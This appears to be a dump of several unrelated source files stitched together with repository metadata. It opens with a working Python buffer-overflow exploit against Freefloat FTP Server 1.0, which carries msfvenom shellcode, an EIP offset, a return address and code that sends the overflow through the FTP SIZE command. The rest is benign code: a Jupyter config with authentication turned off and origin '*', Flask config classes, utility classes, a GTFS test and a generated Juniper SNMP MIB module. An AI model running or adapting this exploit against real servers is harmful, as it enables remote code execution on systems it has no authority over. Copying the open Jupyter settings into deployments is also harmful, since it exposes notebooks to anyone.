] | 2 | 2021-09-08T23:57:47.000Z | 2022-02-15T09:58:36.000Z | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | null | null | null | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-09T13:42:12.000Z | 2022-02-15T23:39:02.000Z | #!/usr/bin/env python
#---------------------------------------------------------------------------------------------#
# Software = Freefloat FTP server version 1.0 #
# Download Link = http://www.mediafire.com/file/9cds1786340avnn/Freefloat+FTP+Server+v1.0.rar #
# Date = 8/20/2017 #
# Reference = https://packetstormsecurity.com/files/103746/freefloatftp-overflow.txt #
# Author = @ihack4falafel #
# Tested on = Windows XP SP3 - Professional #
# EIP Offset = 246 #
# Badchars = "\x00\x0A\x0D" #
# RET Address = 7E429353 "\xFF\xE4" | [USER32.dll] #
# Usage = python exploit.py <target IP> #
#---------------------------------------------------------------------------------------------#
#---------------------------------------------------------------------------------------------#
# List of Vuln. Commands = [DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT] #
#---------------------------------------------------------------------------------------------#
import sys
import socket
import struct
import time
if len(sys.argv) < 2:
print "Usage : python exploit.py <target IP>"
print "Example : python exploit.py 127.0.0.1"
sys.exit(0)
HOST = sys.argv[1]
#------------------------------------------------------------------------------#
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload #
#------------------------------------------------------------------------------#
payload = ""
payload += "\xbd\x71\xa7\xd9\x36\xdd\xc7\xd9\x74\x24\xf4\x5a"
payload += "\x31\xc9\xb1\x31\x31\x6a\x13\x83\xc2\x04\x03\x6a"
payload += "\x7e\x45\x2c\xca\x68\x0b\xcf\x33\x68\x6c\x59\xd6"
payload += "\x59\xac\x3d\x92\xc9\x1c\x35\xf6\xe5\xd7\x1b\xe3"
payload += "\x7e\x95\xb3\x04\x37\x10\xe2\x2b\xc8\x09\xd6\x2a"
payload += "\x4a\x50\x0b\x8d\x73\x9b\x5e\xcc\xb4\xc6\x93\x9c"
payload += "\x6d\x8c\x06\x31\x1a\xd8\x9a\xba\x50\xcc\x9a\x5f"
payload += "\x20\xef\x8b\xf1\x3b\xb6\x0b\xf3\xe8\xc2\x05\xeb"
payload += "\xed\xef\xdc\x80\xc5\x84\xde\x40\x14\x64\x4c\xad"
payload += "\x99\x97\x8c\xe9\x1d\x48\xfb\x03\x5e\xf5\xfc\xd7"
payload += "\x1d\x21\x88\xc3\x85\xa2\x2a\x28\x34\x66\xac\xbb"
payload += "\x3a\xc3\xba\xe4\x5e\xd2\x6f\x9f\x5a\x5f\x8e\x70"
payload += "\xeb\x1b\xb5\x54\xb0\xf8\xd4\xcd\x1c\xae\xe9\x0e"
payload += "\xff\x0f\x4c\x44\xed\x44\xfd\x07\x7b\x9a\x73\x32"
payload += "\xc9\x9c\x8b\x3d\x7d\xf5\xba\xb6\x12\x82\x42\x1d"
payload += "\x57\x7c\x09\x3c\xf1\x15\xd4\xd4\x40\x78\xe7\x02"
payload += "\x86\x85\x64\xa7\x76\x72\x74\xc2\x73\x3e\x32\x3e"
payload += "\x09\x2f\xd7\x40\xbe\x50\xf2\x22\x21\xc3\x9e\x8a"
payload += "\xc4\x63\x04\xd3"
#----------------------------#
# Buffer Structure #
#----------------------------#
# buffer = SIZE #
# buffer = " " #
# buffer = AAA...........AAA #
# buffer = EIP #
# buffer = NOPSled #
# buffer = payload #
# buffer = BBB...........BBB #
# buffer = "\r\n" #
#----------------------------#
buffer = "SIZE"
buffer += " "
buffer += "A" * 246
buffer += struct.pack('<L', 0x7E429353)
buffer += "\x90" * 40
buffer += payload
buffer += "B" * (1000-246-4-40-len(payload))
buffer += "\r\n"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, 21))
print "[+] Connected to FreeFloat FTP Server with IP: %s and port: 21 " %(HOST)
print "[+] sending USER test.."
time.sleep(1)
s.send("USER test\r\n")
banner = s.recv(1024)
print banner
print "[+] sending PASS test.."
time.sleep(1)
s.send("PASS test\r\n")
logged_in = s.recv(1024)
print logged_in
print "[+] sending %s bytes evil payload.." %len(buffer)
time.sleep(1)
s.send(buffer)
print "FreeFloat FTP Server should be crashed by now \m/"
s.close()
except Exception,msg:
print "[+] Unable to connect to FreeFloat FTP Server"
sys.exit(0)
| 42.5 | 103 | 0.473126 | 526 | 4,335 | 3.891635 | 0.574144 | 0.029311 | 0.043967 | 0.016121 | 0.053249 | 0.045921 | 0 | 0 | 0 | 0 | 0 | 0.110977 | 0.235063 | 4,335 | 101 | 104 | 42.920792 | 0.506333 | 0.459746 | 0 | 0.084746 | 0 | 0.305085 | 0.552828 | 0.378781 | 0 | 0 | 0.004384 | 0 | 0 | 0 | null | null | 0.033898 | 0.067797 | null | null | 0.169492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd93571ddd3f2aef88974838f9012f1f21d85a0a | 1,005 | py | Python | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | null | null | null | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | null | null | null | jupyterlab/rootfs/etc/jupyter/jupyter_notebook_config.py | kuchel77/addon-jupyterlab-lite | e764df206838211dc61166b8c58f755bc069c9ad | [
"MIT"
] | 1 | 2020-09-01T12:52:34.000Z | 2020-09-01T12:52:34.000Z | # Configuration file for ipython-notebook.
c = get_config()
# ------------------------------------------------------------------------------
# NotebookApp configuration
# ------------------------------------------------------------------------------
c.GitHubConfig.access_token = ''
c.JupyterApp.answer_yes = True
c.LabApp.user_settings_dir = '/data/user-settings'
c.LabApp.workspaces_dir = '/data/workspaces'
c.NotebookApp.allow_origin = '*'
c.NotebookApp.allow_password_change = False
c.NotebookApp.allow_remote_access = True
c.NotebookApp.allow_root = True
c.NotebookApp.base_url = '/'
c.NotebookApp.ip = '127.0.0.1'
c.NotebookApp.notebook_dir = '/config/notebooks'
c.NotebookApp.open_browser = False
c.NotebookApp.password = ''
c.NotebookApp.port = 28459
c.NotebookApp.token = ''
c.NotebookApp.tornado_settings = {'static_url_prefix': '/static/'}
c.NotebookApp.trust_xheaders = True
c.NotebookApp.tornado_settings = {
'headers': {
'Content-Security-Policy': "frame-ancestors *"
}
}
| 32.419355 | 80 | 0.631841 | 109 | 1,005 | 5.642202 | 0.46789 | 0.273171 | 0.110569 | 0.087805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012101 | 0.095522 | 1,005 | 30 | 81 | 33.5 | 0.664466 | 0.222886 | 0 | 0 | 0 | 0 | 0.173969 | 0.029639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2697eb8543d184a4917850ada01be10ee520ca14 | 1,050 | py | Python | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | instance/config.py | imsplitbit/usermanager | fed3b3c049df1257becfe9ba4cda97a509bba0ec | [
"MIT"
] | null | null | null | import os
class Config(object):
"""
Parent configuration class
"""
DEBUG = False
CSRF_ENABLED = True
SECRET = os.getenv('SECRET')
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')
class DevelopmentConfig(Config):
"""
Configuration for Dev
"""
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrdev.db'
class TestingConfig(Config):
"""
Configuration for testing, with a different db
"""
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrtest.db'
DEBUG = True
class StagingConfig(Config):
"""
Staging configuration
"""
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrstaging.db'
class ProductionConfig(Config):
"""
Production configuration
"""
DEBUG = False
TESTING = False
SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/.usrmgrprod.db'
app_config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'staging': StagingConfig,
'production': ProductionConfig,
}
| 19.444444 | 64 | 0.651429 | 100 | 1,050 | 6.71 | 0.39 | 0.134128 | 0.156483 | 0.160954 | 0.211624 | 0.166915 | 0.116244 | 0 | 0 | 0 | 0 | 0 | 0.225714 | 1,050 | 53 | 65 | 19.811321 | 0.825338 | 0.135238 | 0 | 0.192308 | 0 | 0 | 0.205529 | 0.141827 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.769231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26a02fe66b8303fda126f3d53067be58fe0ee66d | 3,019 | py | Python | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | deepcvr/data/operator.py | john-james-ai/DeepCVR | d8c2f98ee4febf7b0a7131d1cf198cee02fcdb2e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# ================================================================================================ #
# Project : DeepCVR: Deep Learning for Conversion Rate Prediction #
# Version : 0.1.0 #
# File : /core.py #
# Language : Python 3.8.12 #
# ------------------------------------------------------------------------------------------------ #
# Author : John James #
# Email : john.james.ai.studio@gmail.com #
# URL : https://github.com/john-james-ai/cvr #
# ------------------------------------------------------------------------------------------------ #
# Created : Tuesday, March 8th 2022, 8:48:19 pm #
# Modified : Thursday, March 31st 2022, 1:08:51 am #
# Modifier : John James (john.james.ai.studio@gmail.com) #
# ------------------------------------------------------------------------------------------------ #
# License : BSD 3-clause "New" or "Revised" License #
# Copyright: (c) 2022 Bryant St. Labs #
# ================================================================================================ #
"""Defines the interfaces for classes involved in the construction and implementation of DAGS."""
from abc import ABC, abstractmethod
import pandas as pd
from typing import Any
# ------------------------------------------------------------------------------------------------ #
class Operator(ABC):
"""Abstract class for operator classes
Args:
task_id (int): A number, typically used to indicate the sequence of the task within a DAG
task_name (str): String name
params (Any): Parameters for the task
"""
def __init__(self, task_id: int, task_name: str, params: list) -> None:
self._task_id = task_id
self._task_name = task_name
self._params = params
def __str__(self) -> str:
return str(
"Task id: {}\tTask name: {}\tParams: {}".format(
self._task_id, self._task_name, self._params
)
)
@property
def task_id(self) -> int:
return self._task_id
@property
def task_name(self) -> str:
return self._task_name
@property
def params(self) -> Any:
return self._params
@abstractmethod
def execute(self, data: pd.DataFrame = None, context: dict = None) -> Any:
pass
| 45.742424 | 100 | 0.358397 | 235 | 3,019 | 4.47234 | 0.510638 | 0.045671 | 0.038059 | 0.03235 | 0.081827 | 0.047574 | 0 | 0 | 0 | 0 | 0 | 0.018717 | 0.38059 | 3,019 | 65 | 101 | 46.446154 | 0.543316 | 0.698576 | 0 | 0.115385 | 0 | 0 | 0.045292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.038462 | 0.115385 | 0.153846 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
26b05d0468e1ce34d5f5ce4a0d7aa6143f0f46e1 | 1,165 | py | Python | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | null | null | null | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | 1 | 2022-01-22T14:36:57.000Z | 2022-01-24T07:19:44.000Z | centralpy/responses/attachment_listing.py | pmaengineering/centralpy | edd89925bcc4204add1bf93b7ff3437cc0e6ea92 | [
"MIT"
] | 1 | 2021-06-30T13:45:09.000Z | 2021-06-30T13:45:09.000Z | """A module for the AttachmentListing class."""
from typing import List
from requests.models import Response
class AttachmentListing:
"""A class to respresent an attachments listing."""
def __init__(self, response: Response):
self.response = response
def has_attachment(self, filename: str) -> bool:
"""Check if the attachment listing has the filename."""
return any(filename == item["name"] for item in self.get_attachments())
def get_attachments(self) -> list:
"""Return the list of attachments."""
return self.response.json()
def get_attachment_filenames(self) -> List[str]:
"""Return a list of all attachment filenames."""
return [item["name"] for item in self.get_attachments()]
def print_all(self) -> None:
"""Print all attachments."""
attachments = self.get_attachments()
if not attachments:
print("-> No attachments found")
else:
for item in attachments:
print(f'-> name: "{item["name"]}", exists: {item["exists"]}')
def __repr__(self):
return f"AttachmentListing({self.response!r})"
| 32.361111 | 79 | 0.630901 | 136 | 1,165 | 5.286765 | 0.352941 | 0.066759 | 0.037552 | 0.041725 | 0.105702 | 0.105702 | 0.105702 | 0.105702 | 0.105702 | 0 | 0 | 0 | 0.243777 | 1,165 | 35 | 80 | 33.285714 | 0.816118 | 0.201717 | 0 | 0 | 0 | 0 | 0.131257 | 0.040044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0.05 | 0.65 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
26b0869d667ae5f86081d97cacbdab9265068d3d | 436 | py | Python | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | null | null | null | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | 7 | 2016-02-24T15:08:51.000Z | 2016-02-25T14:58:24.000Z | test/base.py | nathanhilbert/pygtfs_atx | ab620ba730f9dbe96bcc904aca8dfa9a70d77412 | [
"MIT"
] | null | null | null | from pygtfs import Schedule
from pygtfs import append_feed, delete_feed, overwrite_feed, list_feeds
class GTFSSmallSetup(object):
def __init__(self):
self.schedule = Schedule(":memory:")
append_feed(self.schedule, "test/data/atx_small" )
# class GTFSATXSetup(object):
# def __init__(self):
# self.schedule = Schedule(":memory:")
# append_feed(self.schedule, "test/data/atx_small" ) | 33.538462 | 72 | 0.678899 | 51 | 436 | 5.490196 | 0.431373 | 0.171429 | 0.114286 | 0.121429 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0.578571 | 0 | 0 | 0.204128 | 436 | 13 | 73 | 33.538462 | 0.806916 | 0.355505 | 0 | 0 | 0 | 0 | 0.101887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
26b2a19eddfdb3a10685a4136d20812f47f2c278 | 41,729 | py | Python | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/JUNIPER-WX-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-WX-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-WX-GLOBAL-REG
# Produced by pysmi-0.3.4 at Mon Apr 29 19:50:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint")
jnxWxCommonEventDescr, = mibBuilder.importSymbols("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr")
jnxWxSpecificMib, jnxWxModules = mibBuilder.importSymbols("JUNIPER-WX-GLOBAL-REG", "jnxWxSpecificMib", "jnxWxModules")
TcQosIdentifier, TcAppName = mibBuilder.importSymbols("JUNIPER-WX-GLOBAL-TC", "TcQosIdentifier", "TcAppName")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, iso, ModuleIdentity, TimeTicks, MibIdentifier, ObjectIdentity, Gauge32, IpAddress, Counter32, Bits, Integer32, NotificationType, Counter64, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "ModuleIdentity", "TimeTicks", "MibIdentifier", "ObjectIdentity", "Gauge32", "IpAddress", "Counter32", "Bits", "Integer32", "NotificationType", "Counter64", "Unsigned32")
TextualConvention, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TimeStamp", "DisplayString")
jnxWxMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 8239, 1, 1, 4))
jnxWxMibModule.setRevisions(('2004-05-24 00:00', '2003-06-23 00:00', '2002-03-28 00:00', '2002-03-27 00:00', '2001-12-19 12:00',))
if mibBuilder.loadTexts: jnxWxMibModule.setLastUpdated('200203280000Z')
if mibBuilder.loadTexts: jnxWxMibModule.setOrganization('Juniper Networks, Inc')
jnxWxMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1))
if mibBuilder.loadTexts: jnxWxMib.setStatus('current')
jnxWxConfMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 1))
if mibBuilder.loadTexts: jnxWxConfMib.setStatus('current')
jnxWxObjs = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2))
if mibBuilder.loadTexts: jnxWxObjs.setStatus('current')
jnxWxEvents = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3))
if mibBuilder.loadTexts: jnxWxEvents.setStatus('current')
jnxWxStatsUpdateTime = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 1), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsUpdateTime.setStatus('current')
jnxWxStatsAsmCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAsmCount.setStatus('current')
jnxWxStatsVirtEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsVirtEndptCount.setStatus('current')
jnxWxStatsAppCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAppCount.setStatus('current')
jnxWxStatsAccelAppCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsAccelAppCount.setStatus('current')
jnxWxStatsQosClassCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsQosClassCount.setStatus('current')
jnxWxStatsQosEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsQosEndptCount.setStatus('current')
jnxWxStatsWpEndptCount = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxStatsWpEndptCount.setStatus('current')
jnxWxSysStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4))
if mibBuilder.loadTexts: jnxWxSysStats.setStatus('current')
jnxWxSysStatsBytesInAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesInAe.setStatus('current')
jnxWxSysStatsBytesOutAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutAe.setStatus('current')
jnxWxSysStatsPktsInAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsInAe.setStatus('current')
jnxWxSysStatsPktsOutAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOutAe.setStatus('current')
jnxWxSysStatsBytesOutOob = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutOob.setStatus('current')
jnxWxSysStatsBytesPtNoAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesPtNoAe.setStatus('current')
jnxWxSysStatsPktsPtNoAe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsPtNoAe.setStatus('current')
jnxWxSysStatsBytesPtFilter = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesPtFilter.setStatus('current')
jnxWxSysStatsPktsPtFilter = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsPtFilter.setStatus('current')
jnxWxSysStatsBytesOfPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOfPt.setStatus('current')
jnxWxSysStatsPktsOfPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOfPt.setStatus('current')
jnxWxSysStatsBytesTpIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpIn.setStatus('current')
jnxWxSysStatsPktsTpIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpIn.setStatus('current')
jnxWxSysStatsBytesTpOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpOut.setStatus('current')
jnxWxSysStatsPktsTpOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpOut.setStatus('current')
jnxWxSysStatsBytesTpPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesTpPt.setStatus('current')
jnxWxSysStatsPktsTpPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsTpPt.setStatus('current')
jnxWxSysStatsPeakRdn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 18), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPeakRdn.setStatus('current')
jnxWxSysStatsThruputIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsThruputIn.setStatus('current')
jnxWxSysStatsThruputOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsThruputOut.setStatus('current')
jnxWxSysStatsBytesInRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesInRe.setStatus('current')
jnxWxSysStatsBytesOutRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsBytesOutRe.setStatus('current')
jnxWxSysStatsPktsInRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsInRe.setStatus('current')
jnxWxSysStatsPktsOutRe = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktsOutRe.setStatus('current')
jnxWxSysStatsPktSizeIn1 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn1.setStatus('current')
jnxWxSysStatsPktSizeIn2 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn2.setStatus('current')
jnxWxSysStatsPktSizeIn3 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn3.setStatus('current')
jnxWxSysStatsPktSizeIn4 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn4.setStatus('current')
jnxWxSysStatsPktSizeIn5 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn5.setStatus('current')
